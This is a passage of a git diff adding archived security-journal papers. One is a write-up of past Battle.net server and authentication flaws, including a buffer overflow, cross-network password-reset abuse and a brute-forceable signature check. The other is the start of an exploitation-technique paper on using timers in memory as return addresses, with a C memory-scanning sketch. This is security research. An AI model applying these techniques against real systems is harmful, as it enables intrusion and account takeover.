Battle.net, and was added at a +later date via a client patch (and server-side modifications). + +On top of that, many clients also have very significant differences in feature +support. To give an example, for many years Diablo and Diablo Shareware were +both supported on Battle.net concurrently while Diablo supported user accounts +and the shareware version did not. As one can imagine, this sort of thing can +give rise to a great many problems. The version control and update mechanism +is not separate from the rest of the protocol. Indeed, the same server, and +the same connection, are used for version control, but a different connection +to the same server is used for the transfer of client patches. As a result, +any compliant Battle.net server is required to support not only the current +Battle.net protocol version that is in use by the current patch level of every +existing client, but it must also support the first few messages used by every +single version of every single Battle.net client ever released, or at least +until the version checking mechanism can be invoked to distribute a new +version (which is not the first task that occurs in some older iterations of +the protocol). + +To make matters worse, there is now a proliferation of third party clients +using the Battle.net protocol (to varying degrees of accuracy compared to the +Blizzard game clients they attempt to emulate) in use on Battle.net today. +This began sometime in mid-1999 when a program called ``NBBot'',authored by +Andreas Hansson, who often goes by the handle ``Adron'', entered widespread +distribution, though this was not the intent of the author. 
NBBot was the
+first third party client to emulate the Battle.net protocol to an extent that
+allowed it to masquerade as a game client. Several years later, the source
+code for this program was inadvertently released to wide-spread public
+distribution, which kicked off large-scale development of third party
+Battle.net protocol clients by a number of authors.
+
+Despite all of these challenges, Blizzard has managed to keep Battle.net up
+and running for nearly a decade now, and claims over a million active users.
+However, the road leading up to the present day has not been ``clear sailing''
+for Blizzard. This leads us into some of the specific problems facing
+Battle.net leading up until the present day. One of the major classes of
+problems encountered by Blizzard as Battle.net has grown is that it was (in
+the author's opinion) simply not designed to support the circumstances in
+which it eventually ended up being used. This is evident in a variety of
+events that have occurred over the past few years:
+
+ - The addition of persistent player accounts to the system.
+ - The addition of the text-based chat protocol to the system.
+ - Significant changes to the backend architecture utilized by
+   Battle.net.
+
+Although it is difficult to provide exact details of these changes, having not
+worked at Blizzard, many of them can be inferred.
+
+
+3.1) Network issues
+
+Battle.net was originally set up as a small number of linked servers placed at
+various strategic geographical locations. They were ``linked'' in the sense
+that players on one server could interact with players on a different server
+as seamlessly as with players connected to the same server. This architecture
+eventually proved unsupportable, as increasing usage of Battle.net led to the
+common occurrence of "server splits", in which one or more servers would be
+unable to keep up with the rest of the network and become temporarily
+disconnected.
+
+Eventually, the system was split into two separate networks (each starting
+with a copy of all account and player data present at the time of the
+division): the Asian network, and the United States and European network. Each
+network was comprised of a number of different servers that players could
+connect to in an optimized fashion based on server response time.
+
+Some time later, even this system proved untenable. The network was once
+again permanently fragmented, this time splitting the United States and
+European network into three subnetworks. This is the topology retained today,
+with the networks designated ``USEast'', ``USWest'', ``Europe'', ``Asia''. It
+is believed that all servers in a server network (also referred to as a
+``cluster'' or ``gateway'') are, at present, located at the same physical
+hosting facility on a high-speed LAN.
+
+As new game requirements came about, a new architecture for Diablo II and
+Warcraft III was required. In these cases, games are hosted on
+Blizzard-operated servers and not on client machines in order to make them
+more resilient to attempts to hack the game to gain an unfair advantage.
+There are significant differences to how this is implemented for Diablo II and
+Warcraft III, and it is not used for certain types of games in Warcraft III.
+This resulted in a significant change to the way the service performs its
+primary function, that is, game matchmaking.
+ + +3.2) Client/Server issues + +Aside from the basic network design issues, other problems have arisen from +the fact that Blizzard did not expect, or intend for, third party programs to +use its Battle.net protocol. As a result, proper validation has not always +been in place for certain conditions that would not be generated through the +Blizzard client software. + +As mentioned earlier, many developers eventually turned to the using the +Battle.net protocol directly as opposed to the text-based protocol in order to +circumvent certain limitations in the text-based protocol. There are a number +of reasons for this. Historically, clients utilizing the Battle.net protocol +have been able to enter channels that are already full (private channels on +Battle.net have a limit of 40 users, normally), and have been able to perform +various account management functions (such as creating accounts, changing +passwords, managing user profile information, and so-forth) that are not +doable through the text-based protocol. + +In addition to having access to extended protocol-level functionality, clients +using the Battle.net protocol are permitted to open up to eight connections to +a single Battle.net network per IP address (as opposed to the text-based +protocol, which only allows a single connection per IP address). This limit +was originally four connections per IP address, and was raised after NATs, +particularly in cyber cafes, gained popularity. + +This was particularly attractive to a number of persons on Battle.net who used +third-party chat clients for a variety of reasons. The primary reason was +generally the same ``channel war'' phenomenon that has historically plagued +IRC was also rather prevalent on Battle.net, and being able to field a large +number of clients per IP address was seen as a significant advantage. + +Due to the prevalence of ``channel wars'' on Battle.net, artificially large +numbers of third-party clients utilizing the Battle.net protocol came into +use. Although it is difficult to estimate the exact number of users of such +clients, the author has observed upwards of several thousand being logged on +to the service at once. + +The development and usage of said third party clients has resulted in the +discovery of a number of other issues with Battle.net. While most of the +issues covered here are either already fixed or relatively minor, there is +still value in discussing them. + + +3.2.1) Client connection limits + +Through the use of certain messages in the Battle.net protocol, it is possible +to enter a channel beyond the normal 40 user limit. This was due to the fact +that the method a game client would use to return to a chat channel after +leaving a game would not properly check the user count. After miscreants +exploited this vulnerability to put thousands of users into one channel, which +subsequently lead to server crashes, Blizzard finally fixed this +vulnerability. + + +3.2.2) Chat message server overflow + +The server software often assumed that the client would only perform 'sane' +actions, and one of these assumptions dealt with how long of a chat message a +client could send. The server apparently copied a chat message indicated by a +Battle.net protocol client into a fixed 512-byte buffer without proper length +checking, such that a client could crash a server by sending a long enough +message. 
Due to the fact that Blizzard's server binaries are not publicly
+available, it would not have been easy to exploit this flaw to run arbitrary
+code on the server. This serious vulnerability was fixed within a day of
+being reported.
+
+
+3.2.3) Client authentication
+
+Aside from general sanity checks, Blizzard also has had some issues relating
+to authentication. Blizzard currently has two systems in use for user account
+password authentication. In order to create a third party client, these
+systems had to be understood and third party implementations produced. This
+has revealed several flaws in their implementation.
+
+The first system Blizzard utilizes is a challenge-response system that uses a
+SHA-1 hash of the client's password. The game client implementation of this
+system lowercases the entire password string before hashing it, significantly
+reducing password security. (A third party client could opt not to do this,
+and as such create an account that is impossible to log on to through the
+official Blizzard game clients or the text-based protocol. The text-based
+protocol sends a user's password in cleartext, after which the server
+lowercases the password and internally compares a hash of it with the account
+in question's password in a database.) However, a more serious security
+problem remains: in SHA-1, there are a number of bit rotate left (``ROL'')
+operations. The Blizzard programmer responsible for implementing this
+apparently switched the two parameters in every call to ROL. That is, if
+there was a ``#define ROL(a, b) (...)'' macro, the programmer swapped the two
+arguments. This drastically reduces the security of Battle.net password
+hashes, as most of the data being hashed ends up being zero bits. (A short
+sketch illustrating the effect of this swap is given at the end of section
+3.2.) Because of the problem of incompatibility with previously created
+accounts, this system is still in use today.
+
+The second system Blizzard utilizes is one based on SRP (Secure Remote
+Password, see http://srp.stanford.edu). Only Warcraft III and its expansion
+use this system for password authentication. This product has its own
+account namespace on Battle.net, so that there are no backwards compatibility
+issues with the older ``broken SHA-1'' method. It is worth noting that
+Warcraft III clients and older clients can still communicate via chat;
+however, the server imposes a namespace decoration on client account names for
+communication between namespaces, such that a client logged on as Warcraft III
+would see a user ``User'' logged on as Starcraft on the USEast Battle.net
+network as ``User@USEast''. However, this system is also flawed, albeit less
+severely. In particular, the endian-ness of calculations is reversed, but
+this is not properly accounted for in some parts of the implementation, such
+that some operations expecting to remove trailing zero bits instead remove
+leading zero bits after converting a large integer to a flat binary buffer.
+There is a second flaw, as well, although it does not negatively impact the
+security of the client: In some of the conversions from big numbers to flat
+buffers, the server does not properly zero out bytes if the big number does
+not occupy 32 non-zero bytes, and instead leaves uninitialized data in them.
+The result is that some authentication attempts will randomly fail. As far as
+the author knows, this bug is still present in Battle.net.
+
+
+3.2.4) Client namespace spoofing
+
+With the release of Warcraft III, a separate account namespace was provided
+for users of that product, as mentioned above.
The server internally keeps
+track of a user's account name as ``x#username'', where x is a character
+specifying an alternate namespace (the only currently known namespace
+designation is 'w', for Warcraft III). This is known due to a message that
+exposes the internal unique name for a user to protocol clients. While the
+character '#' has never been permitted in account names, if a user logs on to
+the same account more than once, they are assigned a unique name of the format
+'accountname#serial', where 'serial' is a number that is incremented according
+to how many duplicate logons of the same account there are. Due to a lack of
+parameter checking in the account creation process, it was at one time
+possible to create accounts, via a third party client, that were one character
+long (all of the official game clients do not allow the user to do this). For
+some time, such accounts confused the server into thinking that a user was
+actually on a different (non-existent) namespace, and thus allowed a user who
+logged on to a single character account more than once to become impossible to
+'target' via any of the user management functions. For example, such a user
+could not be sent a private message, ignored, banned or kicked from a channel,
+or otherwise affected by any other commands that operate on a specific user.
+This was, of course, frequently abused to spam individuals with the victims
+being unable to stop the spammer (or even ignore them!). This problem has been
+fixed in the current server version.
+
+
+3.2.5) Username collisions
+
+As referred to in the previous sub-section, for some time the server allowed
+Diablo Shareware clients. These clients did not log on to accounts, and
+instead simply assigned themselves a username. Normal procedures were
+followed if the username was already in use, which involved appending a serial
+number to the end to make a unique name. Besides the obvious problem of being
+able to impersonate someone to a user who was not clever enough to check what
+game type one was logged on as, this creates an additional vulnerability that
+was heavily exploited in ``channel wars''. If a server became split from the
+rest of the network due to load, one could log on to that server using Diablo
+Shareware, and pick the same name as someone logged on to the rest of the
+network using a different game type. When the server split was resolved, the
+server would notice that there were now two users with the same unique name,
+and disconnect both of them with the ``Duplicate username detected.'' message
+(this is synonymous with the ``colliding'' exploits of old that used to plague
+IRC). This could be used to force users offline any time a server split
+occurred. Being able to do so was desirable in the sense that there could
+normally only be one channel operator in a channel at a time (barring server
+splits, which could be used to create a second operator if the channel was
+entirely emptied and then recreated on the split server). When that operator
+left, the next person in line would be gifted with operator permissions
+(unless the operator had explicitly 'designated' a new heir for operator
+permissions). So, one could ``take over'' a channel by systematically
+disconnecting those ``ahead of'' one's client in a channel. A channel is
+ordered by a user's age in the channel.
+
+
+3.2.6) Server de-synchronization
+
+At one time, a race condition existed such that if a malicious user were to
+log on to two connected (i.e.
not-split) servers at the same time, the two servers would
+cease to communicate with one another, causing a server split to occur. It is
+difficult to provide an exact explanation for why this would occur given the
+collision elimination mechanism described above for users that are logged on
+with the same unique name, but it is assumed that in the process of
+synchronizing a new user between servers, there is a period of time where
+a second server can also attempt to synchronize the same user and cause one of
+the servers to get into an invalid state. According to observations, this
+invalid state would eventually be resolved automatically, usually after 10-15
+minutes.
+
+
+3.2.7) Seeing invisible users
+
+Battle.net administrators have the ability to become invisible to normal
+users. However, until recently, this was flawed in that the server would
+expose the existence of an invisible user to regular users during certain
+operations. In particular, if one ignores or unignores a user, the server
+will re-send the state of all users that are ignored or unignored in the
+current channel. Before this bug was fixed, this list included any invisible
+users. It is worth noting that the official game clients will ignore any
+unknown users returned in the state update message, so this vulnerability
+could only be utilized by a third party client.
+
+
+3.2.8) Administrative command discovery
+
+Originally, Battle.net would provide no acknowledgement if one issued an
+unrecognized chat command ("slash-command"). Blizzard later changed the
+server software to respond with an error message if a user sent an unknown
+command, but the server originally silently ignored the command if the user
+issued a privileged (administrator-only) command. This allowed end users to
+discover the names of various commands accessible to system administrators.
+
+
+3.2.9) Gaining administrative privileges
+
+Due to an oversight in the way administrator permissions are assigned to
+Battle.net accounts, it was at one time possible to overwrite the account of
+an administrator with a new account and keep the special permissions otherwise
+associated with the account. (An account can be overwritten like so if it has
+not been accessed in 90 days). This could have very nearly resulted in a
+disaster for Blizzard, had a more malicious user discovered this vulnerability
+and abused such privileges.
+
+
+3.2.10) Obtaining passwords
+
+Eventually, Blizzard implemented a password recovery mechanism whereby one
+could associate an e-mail address with an account, and request a password
+change through the Battle.net protocol for an account at logon time. This
+would result in an e-mail being dispatched to the registered address. If the
+user then replied to the mail as instructed, they would be automatically
+mailed back with a new account password. Unfortunately, as originally
+implemented, this system did not properly perform validation on the
+confirmation mail that the user was required to send. In particular, if a
+malicious user created an account ``victim'' on one Battle.net network, such
+as the Asian network, and then requested a password reset for that account,
+they could alter the return email slightly and actually reset the password for
+the account ``victim'' on a different Battle.net network, such as the USEast
+network. This exploit was actually publicly disclosed and saw over a day of
+heavy abuse before Blizzard managed to patch it.
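+
+Before moving on, the ROL parameter swap described in section 3.2.3 is easy to
+demonstrate in isolation. The Python fragment below is only a guess at the
+shape of the bug (the actual Blizzard macro is not public); it simply shows why
+reversing the arguments throws away most of the input being hashed:
+
+def rol(value, count):
+    # Correct 32-bit rotate left.
+    count &= 31
+    return ((value << count) | (value >> (32 - count))) & 0xFFFFFFFF
+
+def rol_swapped(value, count):
+    # What happens when every call site has its arguments reversed.
+    return rol(count, value)
+
+# SHA-1 rotates by small fixed counts such as 5 and 30. With the arguments
+# swapped, the quantity being rotated is the constant count, so the result
+# depends on only the low five bits of the actual message data.
+for word in (0x12345678, 0xCAFEBABE, 0x00000001):
+    print(hex(rol(word, 5)), hex(rol_swapped(word, 5)))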
+
+
+4) Battle.net server emulation
+
+Blizzard 'declared war' on the programmers of servers that implement the
+Battle.net protocol some time ago when they took the developers of ``bnetd''
+to court. As of Warcraft III, they have taken active measures to make life
+difficult for developers programming third party Battle.net-compatible
+servers. In particular, two actions are of note:
+
+During the Warcraft III Expansion beta test, Blizzard implemented an
+encryption scheme for the Battle.net protocol (this was only used during the
+beta test and not on production Battle.net). This consisted of using the RC4
+cipher to encrypt messages sent and received from the server. The tricky part
+was that Blizzard had hardcoded constants that were encrypted using the cipher
+state, but never actually sent on the wire (these constants were different for
+each message). This made implementing a server difficult, as one had to find
+each magic constant. Unfortunately, Blizzard neglected to consider the
+possibility of someone releasing a hacked version of the client that zeroed
+the RC4 initialization parameters, such that the entire encrypted stream
+became plaintext.
+
+After several patches, Blizzard implemented a scheme by which a Warcraft III
+client could verify that it was indeed connecting to a genuine Blizzard
+Battle.net server. This scheme worked by having the Battle.net server sign
+its IP address and send the resulting signature to the client, which would
+refuse to log on if the server's IP address did not match the signature.
+However, in the original implementation, the game client only checked the
+first four bytes of the signed data, and did not validate the remaining
+(normally zero) 124 bytes. This allows one to easily brute-force a signature
+that has a desired IP address, as one only has to check 32 bits of possible
+signatures at most to find it.
+
+
+5) Conclusion
+
+Developing a platform to support a diverse set of requirements such as
+Battle.net is certainly no easy task. Though the original design could have
+perhaps been improved upon, it is the author's opinion that given what they
+had to work with, Blizzard did a reasonable job of ensuring that the service
+they set out to create stood the test of time, especially considering that
+support for all the future features of their later game clients could not have
+been predicted at the time the system was originally created. Nevertheless, it
+is the author's opinion that a system designed where clients are untrusted and
+all actions performed by them are subject to full validation would have been
+far more secure from the start, without any of the various problems Blizzard
+has encountered over the years.
diff --git a/uninformed/2.2.txt b/uninformed/2.2.txt
new file mode 100644
index 0000000..44b7ecc
--- /dev/null
+++ b/uninformed/2.2.txt
@@ -0,0 +1,971 @@
+Temporal Return Addresses: Exploitation Chronomancy
+skape
+mmiller@hick.org
+Last modified: 8/6/2005
+
+
+1) Foreword
+
+Abstract: Nearly all existing exploitation vectors depend on some knowledge of
+a process' address space prior to an attack in order to gain meaningful
+control of execution flow. In cases where this is necessary, exploit authors
+generally make use of static addresses that may or may not be portable between
+various operating system and application revisions. This fact can make
+exploits unreliable depending on how well researched the static addresses were
+at the time that the exploit was implemented.
In some cases, though, it may +be possible to predict and make use of certain addresses in memory that do not +have static contents. This document introduces the concept of temporal +addresses and describes how they can be used, under certain circumstances, to +make exploitation more reliable. + +Disclaimer: This document was written in the interest of education. The +author cannot be held responsible for how the topics discussed in this +document are applied. + +Thanks: The author would like to thank H D Moore, spoonm, thief, jhind, +johnycsh, vlad902, warlord, trew, vax, uninformed, and all the friends of +nologin! + +With that, on with the show... + + +2) Introduction + +A common impediment to the implementation of portable and reliable exploits is +the location of a return address. It is often required that a specific +instruction, such as a jmp esp, be located at a predictable location in memory +so that control flow can be redirected into an attacker controlled buffer. +This scenario is more common on Windows, but applicable scenarios exist on +UNIX derivatives as well. Many times, though, the locations of the +instructions will vary between individual versions of an operating system, +thus limiting an exploit to a set of version-specific targets that may or may +not be directly determinable at attack time. In order to make an exploit +independent of, or at least less dependent on, a target's operating system +version, a shift in focus becomes necessary. + +Through the blur of rhyme and reason an attacker might focus and realize that +not all viable return addresses will exist indeterminably in a target process' +address space. In fact, viable return addresses can be found in a transient +state throughout the course of a program's execution. For instance, a pointer +might be stored at a location in memory that happens to contain a viable two +byte instruction somewhere within the bytes that compose the pointer's +address. Alternatively, an integer value somewhere in memory could be +initialized to a value that is equivalent to a viable instruction. In both +cases, though, the contents and locations of the values will almost certainly +be volatile and unpredictable, thus making them unsuitable for use as return +addresses. + +Fortunately, however, there does exist at least one condition that can lend +itself well to portable exploitation that is bounded not by the operating +system version the target is running on, but instead by a defined window of +time. In a condition such as this, a timer of some sort must exist at a +predictable location in memory that is known to be updated at a constant time +interval, such as every second. The location in memory that the timer resides +at is known as a temporal address. On top of this, it is also important for +the attacker determine the scale of measurement the timer is operating on, +such as whether or not it's measured in epoch time (from 1970 or 1601) or if +it's simply acting as a counter. With these three elements identified, an +attacker can attempt to predict the periods of time where a useful instruction +can be found in the bytes that compose the future state of any timer in +memory. + +To help illustrate this, suppose an attacker is attempting to find a reliable +location of a jmp edi instruction. The attacker knows that the program being +exploited has a timer that holds the number of seconds since Jan. 1, 1970 at a +predictable location in memory. 
By doing some analysis, the attacker could +determine that on Wednesday July 27th, 2005 at 3:39:12PM CDT, a jmp edi could +be found within any four byte timer that stores the number of seconds since +1970. The window of opportunity, however, would only last for 4 minutes and 16 +seconds assuming the timer is updated every second. + +By accounting for timing as a factor in the selection of return addresses, an +attacker can be afforded options beyond those normally seen when the address +space of a process is viewed as unchanging over time. In that light, this +document is broken into three portions. First, the steps needed to find, +analyze, and make use of temporal addresses will be explained. Second, +upcoming viable opcode windows will be shown and explained along with methods +that can be used to determine target time information prior to exploitation. +Finally, examples of commonly occurring temporal addresses on Windows NT+ will +be described and analyzed to provide real world examples of the subject of +this document. + +Before starting, though, it is important to understand some of the terminology +that will be used, or perhaps abused, in the interest of conveying the +concepts. The term temporal address is used to describe a location in memory +that contains a timer of some sort. The term opcode is used interchangeably +with the term instruction to convey the set of viable bytes that could +partially compose a given temporal state. The term update period is used to +describe the amount of time that it takes for the contents of a temporal +address to change. Finally, the term scale is used to describe the unit of +measure for a given temporal address. + + +3) Locating Temporal Addresses + +In order to make use of temporal addresses it is first necessary to devise a +method of locating them. To begin this search it is necessary that one +understand the attributes of a temporal address. All temporal addresses are +defined as storing a time-associated counter that increments at a constant +interval. For instance, an example would be a location in memory that stores +the number of seconds since Jan. 1, 1970 that is incremented every second. As +a more concrete definition, all time-associated counters found in memory are +represented in terms of a scale (the unit of measure), an interval or period +(how often they are updated), and have a maximum storage capacity (variable +size). If any these parts are unknown or variant for a given memory location, +it is impossible for an attacker to consistently leverage it for use as +time-bounded return address because of the inability to predict the byte +values at the location for a given period of time. + +With the three major components of a temporal address identified (scale, +period, and capacity), a program can be written to search through a process' +address space with the goal of identifying regions of memory that are updated +at a constant period. From there, a scale and capacity can be inferred based +on an arbitrarily complex set of heuristics, the simplest of which can +identify regions that are storing epoch time. It's important to note, though, +that not all temporal addresses will have a scale that is measured as an +absolute time period. Instead, a temporal address may simply store the number +of seconds that have passed since the start of execution, among other +scenarios. These temporal addresses are described as having a scale that is +simply equivalent to their period and are for that reason referred to as +counters. 
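+
+As a rough example of the simplest such heuristic, the fragment below (an
+illustration only, not the author's implementation) checks whether a value
+read from memory looks like the current time expressed against one of the two
+common epochs:
+
+import time
+
+SECONDS_1601_TO_1970 = 11644473600        # offset between the two epochs
+
+def guess_scale(value, poll_period=5):
+    now = int(time.time())                # seconds since Jan. 1, 1970
+    if now - poll_period <= value <= now:
+        return "Epoch (1970), 1 second period"
+    # A FILETIME-style 64-bit counter of 100 nanosecond units since 1601.
+    as_seconds = value // 10**7 - SECONDS_1601_TO_1970
+    if now - poll_period <= as_seconds <= now:
+        return "Epoch (1601), 100 nanosecond period"
+    return "Counter (scale unknown)"
+
+print(guess_scale(int(time.time())))      # falls in the 1970 epoch range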
+ +To illustrate the feasibility of such a program, the author has implemented an +algorithm that should be conceptually portable to all platforms, though the +implementation itself is limited to Windows NT+. The approach taken by the +author, at a high level, is to poll a process' address space multiple times +with the intention of analyzing changes to the address space over time. In +order to reduce the amount of memory that must be polled, the program is also +designed to skip over regions that are backed against an image file or are +otherwise inaccessible. + +To accomplish this task, each polling cycle is designed to be separated by a +constant (or nearly constant) time interval, such as 5 seconds. By increasing +the interval between polling cycles the program can detect temporal addresses +that have a larger update period. The granularity of this period of time is +measured in nanoseconds in order to support high resolution timers that may +exist within the target process' address space. This allows the program to +detect timers measured in nanoseconds, microseconds, milliseconds, and +seconds. The purpose of the delay between polling cycles is to give temporal +address candidates the ability to complete one or more update periods. As +each polling cycle occurs, the program reads the contents of the target +process' address space for a given region and caches it locally within the +scanning process. This is necessary for the next phase. + +After at least two polling cycles have completed, the program can compare the +cached memory region differences between the most recent view of the target +process' address space and the previous view. This is accomplished by walking +through the contents of each cached memory region in four byte increments to +see if there is any difference between the two views. If a temporal address +exists, the contents of a the two views should have a difference that is no +larger than the maximum period of time that occurred between the two polling +cycles. It's important to remember that the maximum period can be conveyed +down to nanosecond granularity. For instance, if the polling cycle period was +5 seconds, any portion of memory that changed by more than 5 seconds, 5000 +milliseconds, or 5000000 microseconds is obviously not a temporal address +candidate. To that point, any region of memory that didn't change at all is +also most likely not a temporal address candidate, though it is possible that +the region of memory simply has an update period that is longer than the +polling cycle. + +Once a memory location is identified that has a difference between the two +views that is within or equal to the polling cycle period, the next step of +analysis can begin. It's perfectly possible for memory locations that meet +this requirement to not actually be timers, so further analysis is necessary +to weed them out. At this point, though, memory locations such as these can +be referred to as temporal address candidates. The next step is to attempt to +determine the period of the temporal address candidate. This is accomplished +by some rather silly, but functional, logic. + +First, the delta between the polling cycles is calculated down to nanosecond +granularity. In a best case scenario, the granularity of a polling cycle that +is spaced apart by 5 seconds will be 5000000000 nanoseconds. It's not safe to +assume this constant though, as thread scheduling and other non-constant +parameters can affect the delta between polling cycles for a given memory +region. 
The next step is to iteratively compare the difference between the
two views to the current delta to see if the difference is greater than or
equal to the current delta. If it is, it can be assumed that the difference
is within the current unit of measure. If it's not, the current delta should
be divided by 10 to progress to the next unit of measure. When broken down,
the progressive transition in units of measurement is described in figure 3.1.


    Delta        Measurement
    ---------------------------
    1000000000   Nanoseconds
    100000000    10 Nanoseconds
    10000000     100 Nanoseconds
    1000000      Microseconds
    100000       10 Microseconds
    10000        100 Microseconds
    1000         Milliseconds
    100          10 Milliseconds
    10           100 Milliseconds
    1            Seconds

    Figure 3.1: Delta measurement reductions


Once a unit of measure for the update period is identified, the difference is
divided by the current delta to produce the update period for a given temporal
address candidate. For example, if the difference was 5 and the current delta
was 5, the update period for the temporal address candidate would be 1 second
(5 updates over the course of 5 seconds). With the update period identified,
the next step is to attempt to determine the storage capacity of the temporal
address candidate.

In this case, the author chose to take a shortcut, though there are most
certainly better approaches that could be taken given sufficient interest.
The author chose to assume that if the update period for a temporal address
candidate was measured in nanoseconds, then it was almost certainly at least
the size of a 64-bit integer (8 bytes on x86). On the other hand, all other
update periods were assumed to imply a 32-bit integer (4 bytes on x86).

With the temporal address candidate's storage capacity identified in terms of
bytes, the next step is to identify the scale that the temporal address may be
conveying (the timer's unit of measure). To accomplish this, the program
calculates the two epoch time ranges (seconds since 1970 and since 1601) that
span from the current time minus at least the polling cycle period up to the
current time itself. The temporal address candidate's current value (as
stored in memory) is then converted to seconds using the determined update
period and then compared against the two epoch time ranges. If the
candidate's converted current value is within either epoch time range then it
can most likely be assumed that the temporal address candidate's scale is
measured from epoch time, either from 1970 or 1601 depending on the range it
was within. While this sort of comparison is rather simple, any other
arbitrarily complex set of logic could be put into place to detect other types
of time scales. In the event that none of the logic matches, the temporal
address candidate is deemed to simply have a scale of a counter (as defined
previously in this chapter).

Finally, with the period, scale, and capacity for the temporal address
candidate identified, the only thing left is to check to see if the three
components are equivalent to previously collected components for the given
temporal address candidate. If they differ in orders of magnitude then it is
probably safe to assume that the candidate is not actually a temporal address.
On the other hand, consistent components between polling cycles for a temporal
address candidate are almost a sure sign that it is indeed a temporal address.
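
Condensed into code, the detection logic described above might look something
like the following sketch. It assumes the delta between polls has already been
measured in nanoseconds, leaves out the scale heuristics and the cross-cycle
consistency check just described, and uses illustrative names (capture,
compare) rather than anything from the author's telescope implementation.

#include <windows.h>
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>

/* Copy one region out of the target if it is committed, readable, and
 * not backed by an image file; the caller walks the address space with
 * VirtualQueryEx to fill in mbi and to advance to the next region. */
static unsigned char *capture(HANDLE proc, const MEMORY_BASIC_INFORMATION *mbi)
{
    unsigned char *copy;
    SIZE_T read = 0;

    if (mbi->State != MEM_COMMIT || mbi->Type == MEM_IMAGE ||
        (mbi->Protect & (PAGE_NOACCESS | PAGE_GUARD)))
        return NULL;

    copy = (unsigned char *)malloc(mbi->RegionSize);

    if (copy != NULL &&
        !ReadProcessMemory(proc, mbi->BaseAddress, copy,
                           mbi->RegionSize, &read)) {
        free(copy);
        copy = NULL;
    }

    return copy;
}

/* Walk two snapshots of the same region in four byte steps, flag words
 * whose contents changed, and reduce the nanosecond delta by powers of
 * ten (figure 3.1) to find the unit of measure for the update period. */
static void compare(const unsigned char *prev, const unsigned char *cur,
                    SIZE_T size, uint64_t delta_ns)
{
    SIZE_T off;

    for (off = 0; off + 4 <= size; off += 4) {
        uint32_t a    = *(const uint32_t *)(prev + off);
        uint32_t b    = *(const uint32_t *)(cur  + off);
        uint64_t diff = (b > a) ? b - a : a - b;
        uint64_t unit = delta_ns;

        if (diff == 0)
            continue; /* unchanged, or period longer than the poll */

        while (unit > 1 && diff < unit)
            unit /= 10; /* ns -> 10ns -> 100ns -> ... -> seconds */

        /* Candidate update period expressed in the discovered unit; the
         * scale and consistency checks described above come next. */
        printf("candidate at offset 0x%08lx, period %llu unit(s)\n",
               (unsigned long)off, (unsigned long long)(diff / unit));
    }
}
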

When everything is said and done, the program should collect every temporal
address in the target process that has an update period less than or equal to
the polling cycle period. It should also have determined the scale and size
of the temporal address. When run on Windows against a program that is
storing the current epoch time since 1970 in seconds in a variable every
second, the following output is displayed:


C:\>telescope 2620
[*] Attaching to process 2620 (5 polling cycles)...
[*] Polling address space........

Temporal address locations:

0x0012FE88 [Size=4, Scale=Counter, Period=1 sec]
0x0012FF7C [Size=4, Scale=Epoch (1970), Period=1 sec]
0x7FFE0000 [Size=4, Scale=Counter, Period=600 msec]
0x7FFE0014 [Size=8, Scale=Epoch (1601), Period=100 nsec]


This output tells us that the address of the variable that is storing the
epoch time since 1970 can be found at 0x0012FF7C and has an update period of
one second. The other things that were found will be discussed later in this
document.


3.1) Determining Per-byte Durations

Once the update period and size of a temporal address have been determined, it
is possible to calculate the amount of time it takes to change each byte
position in the temporal address. For instance, if a four byte temporal
address with an update period of 1 second were found in memory, the first byte
(or LSB) would change once every second, the second byte would change once
every 256 seconds, the third byte would change once every 65536 seconds, and
the fourth byte would change once every 16777216 seconds. The reason these
properties are exhibited is because each byte position has 256 possibilities
(0x00 to 0xff inclusive). This means that each byte position increases in
duration by 256 to a given power. This can be described as shown in figure
3.2. Let x equal the byte index starting at zero for the LSB.


    duration(x) = 256 ^ x

    Figure 3.2: Period independent byte durations

The next step to take after determining period-specific byte durations is to
convert the durations to a measure more aptly accessible assuming a period
that is more granular than a second. For instance, figure 3.3 shows that if
each byte duration is measured in 100 nanosecond intervals for an 8 byte
temporal address, a conversion can be applied to convert from 100 nanosecond
intervals for a byte duration to seconds.


    tosec(x) = duration(x) / 10^7

    Figure 3.3: 100 nanosecond byte durations to seconds


This phase is especially important when it comes to calculating viable opcode
windows because it is necessary to know for how long a viable opcode will
exist, which is directly dependent on the duration of the opcode byte closest
to the LSB. This will be discussed in more detail in chapter 4.


4) Calculating Viable Opcode Windows

Once a set of temporal addresses has been located, the next logical step is to
attempt to calculate the windows of time that one or more viable opcodes can
be found within the bytes of the temporal address. It is also just as
important to calculate the duration of each byte within the temporal address.
This is the type of information that is required in order to determine when a
portion of a temporal address can be used as a return address for an exploit.
The approach taken to accomplish this is to make use of the equations provided
in the previous chapter for calculating the number of seconds it takes for
each byte to change based on the update period for a given temporal address.
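
The two equations are small enough to sanity check with a throwaway program.
The sketch below prints the per-byte durations in seconds for an 8 byte timer
with a 100 nanosecond update period and reproduces the values listed in figure
4.1 below; it is provided for illustration and is not part of the original
tooling.

#include <stdio.h>
#include <stdint.h>

/* Sketch: evaluate duration(x) = 256^x and tosec(x) = duration(x) / 10^7
 * for an 8 byte temporal address with a 100 nanosecond update period. */
int main(void)
{
    int x;

    for (x = 0; x < 8; x++) {
        uint64_t duration = 1ULL << (8 * x);      /* 256^x update periods */
        uint64_t seconds  = duration / 10000000;  /* 100ns ticks -> secs  */

        printf("byte index %d changes every %llu second(s)\n",
               x, (unsigned long long)seconds);
    }

    return 0;
}
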
By using the tosec function for each byte index, a table can be created as
illustrated in figure 4.1 for a 100 nanosecond 8 byte timer.


    Byte Index   Seconds (ext)
    ------------------------
    0            0 (zero)
    1            0 (zero)
    2            0 (zero)
    3            1 (1 sec)
    4            429 (7 mins 9 secs)
    5            109951 (1 day 6 hours 32 mins 31 secs)
    6            28147497 (325 days 18 hours 44 mins 57 secs)
    7            7205759403 (228 years 179 days 23 hours 50 mins 3 secs)

    Figure 4.1: 8 byte 100ns per-byte durations in seconds


This shows that any opcodes starting at byte index 4 will have a 7 minute and
9 second window of time. The only thing left to do is figure out when to
strike.


5) Picking the Time to Strike

The time to attack is entirely dependent on both the update period of the
temporal address and its scale. In most cases, temporal addresses that have a
scale that is relative to an arbitrary date (such as 1970 or 1601) are the
most useful because they can be predicted or determined with some degree of
certainty. Regardless, a generalized approach can be used to determine
projected time intervals where useful opcodes will occur.

To do this, it is first necessary to identify the set of instructions that
could be useful for a given exploit, such as a jmp esp. Once identified, the
next step is to break the instructions down into their raw opcodes, such as
0xff 0xe4 for jmp esp. After all the raw opcodes have been collected, it is
then necessary to begin calculating the projected time intervals that the
bytes will occur at. The method used to accomplish this is rather simple.

First, a starting byte index must be determined in terms of the lowest
acceptable window of time that an exploit can use. In the case of a 100
